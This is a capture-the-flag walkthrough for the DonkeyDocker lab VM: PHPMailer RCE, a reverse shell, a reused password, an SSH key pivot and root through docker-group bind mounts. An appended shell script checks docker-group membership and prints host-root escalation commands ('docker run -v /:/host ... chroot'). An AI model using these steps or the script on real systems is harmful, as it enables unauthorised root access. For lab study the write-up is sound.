SecTalks Adelaide – DonkeyDocker CTF Walkthrough

Had a couple of spare hours this afternoon, so I decided to have a go at the SecTalks DonkeyDocker CTF.

Downloaded the DonkeyDocker CTF from VulnHub.

The VM shows the IP in the boot screen.

Scanned with nmap: ports 22 (SSH) and 80 (HTTP) open.

Kicked off a dirb scan straight away. It reported some noise (HTTP 301 redirects rather than real hits), but the site quickly appeared to be running PHPMailer, which had a well-publicised remote code execution bug disclosed at the end of 2016.

The directory structure matches that of the PHPMailer GitHub repository, which confirmed the guess.

Sent a test message through the form, then grabbed the POST in Burp and sent it to Repeater so the request could be modified and replayed by hand.

Using the details from the PoC I tested the payload. Initially it failed: the payload depends on the filesystem path the web application is served from. Further enumeration revealed that the application was hosted under /www, so the exploit was updated to use that path, at which point it succeeded!

I then re-issued the request with a reverse shell payload, set up my nc listener, executed it, and got a shell back!

Once on the server, it was clear we were inside a Docker container.

Enumeration revealed that a user ‘smith’ existed inside the docker container.

‘su smith’ with the password ‘smith’ logs us into that user's account.

flag.txt:

smith@12081bd067cc:~$ cat flag.txt
 This is not the end, sorry dude. Look deeper!
 I know nobody created a user into a docker
 container but who cares? ;-)

But good work!
Here a flag for you: flag0{9fe3ed7d67635868567e290c6a490f8e}

PS: I like 1984 written by George ORWELL

So... where to from here?

The .ssh directory contains a private key, and the comment on the public key in authorized_keys shows the username ‘orwell’, matching the 1984 hint in the flag.

SSH to the Docker host (the VM's port 22) as ‘orwell’ with that private key, and access is immediately granted:

Welcome to
  ___           _            ___          _
 |   \ ___ _ _ | |_____ _  _|   \ ___  __| |_____ _ _
 | |) / _ \ ' \| / / -_) || | |) / _ \/ _| / / -_) '_|
 |___/\___/_||_|_\_\___|\_, |___/\___/\__|_\_\___|_|
                        |__/
                             Made with <3 v.1.0 - 2017


This is my first boot2root - CTF VM. I hope you enjoy it.
if you run into any issue you can find me on Twitter: @dhn_
or feel free to write me a mail to:

- Email: dhn@zer0-day.pw
 - GPG key: 0x2641123C
 - GPG fingerprint: 4E3444A11BB780F84B58E8ABA8DD99472641123C

Level: I think the level of this boot2root challenge
 is hard or intermediate.

Try harder!: If you are confused or frustrated don't forget
 that enumeration is the key!

Thanks: Special thanks to @1nternaut for the awesome
 CTF VM name!

Feedback: This is my first boot2root - CTF VM, please
 give me feedback on how to improve!

Looking forward to the write-ups!

So far, so good. Let's get that sweet root shell!

User ‘orwell’ is in the ‘docker’ group. Docker's own documentation warns that this is equivalent to root on the host: anyone who can talk to the daemon can start a container running as root with any host path bind-mounted into it.

Following the directions at https://reventlov.com/advisories/using-the-docker-command-to-root-the-host, I built a small image and ran it with a host directory bind-mounted into the container, so that root inside the container could write to the host filesystem.

I then had a setuid ‘sh’ binary, owned by root, sitting in temp. But this is BusyBox! It drops privileges for just about every applet, so no matter what I did, I couldn't get it to run as root.

From that shell there was no way to add a user, change a password or do anything else of use. What did work was going back to the bind mount and reading the flag directly with a variant of the advisory's command (the relative cat works because the advisory's image sets its working directory to the mounted volume, /stuff):

donkeydocker:~/docker-test$ docker run -v /root:/stuff -t my-docker-image /bin/sh -c 'cat flag.txt' 
YES!! You did it :-). Congratulations!

I hope you enjoyed this CTF VM.

Drop me a line on twitter @dhn_, or via email dhn@zer0-day.pw

Here is your flag: flag2{60d14feef575bacf5fd8eb06ec7cd8e7}
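As an added example (not from the walkthrough or from the linked advisory), the script below does the two things a practitioner would want at this stage: confirm docker-group membership from the group database, and produce an escalation route that does not depend on planting a setuid shell on a BusyBox host. Instead of copying `sh` into the host and hoping it keeps root, it bind-mounts the host root into a container running as root and chroots into it, or reads a root-only file through the same mount. The image name `alpine` and the sample `/etc/group` contents are constructed for illustration.

```shell
#!/bin/sh
# Added example: docker-group check and host-root escalation via bind mount.
# Not from the walkthrough; image name and sample group file are constructed.

# Constructed sample of /etc/group for the self-test (not the VM's real file).
SAMPLE_GROUP='root:x:0:
docker:x:999:alice,orwell
smith:x:1000:'

# Return 0 if user $1 is listed in the docker group of the group-file text $2.
# Members are the comma-separated fourth field; the commas added around both
# sides make the match exact (orwel does not match orwell).
in_docker_group() {
    while IFS=: read -r name _pw _gid members; do
        [ "$name" = docker ] || continue
        case ",$members," in
            *",$1,"*) return 0 ;;
        esac
    done <<EOF
$2
EOF
    return 1
}

# Live check on the current host: group membership, or a writable daemon
# socket (either one is enough to drive the daemon, and therefore root).
docker_reachable() {
    in_docker_group "$(id -un)" "$(cat /etc/group 2>/dev/null)" ||
        [ -w /var/run/docker.sock ]
}

# Root shell on the host: mount the host filesystem at /host inside a
# container that runs as root, then chroot into it. Nothing setuid is left
# on disk, so a privilege-dropping BusyBox does not get in the way.
host_root_shell_cmd() {
    printf 'docker run --rm -it -v /:/host %s chroot /host /bin/sh\n' "${1:-alpine}"
}

# Read one root-owned host file through the same bind mount (what the
# walkthrough did for /root/flag.txt, without relying on the image's WORKDIR).
read_host_file_cmd() {
    printf 'docker run --rm -v /:/host %s cat /host%s\n' "${1:-alpine}" "$2"
}

if [ "${1:-}" = "--demo" ]; then
    in_docker_group orwell "$SAMPLE_GROUP" && echo "orwell is in the docker group"
    host_root_shell_cmd alpine
    read_host_file_cmd alpine /root/flag.txt
fi
```

Run with `--demo` to see the check against the sample group file and the two commands it would hand you; `docker_reachable` is the live version to run on a host you are actually sitting on.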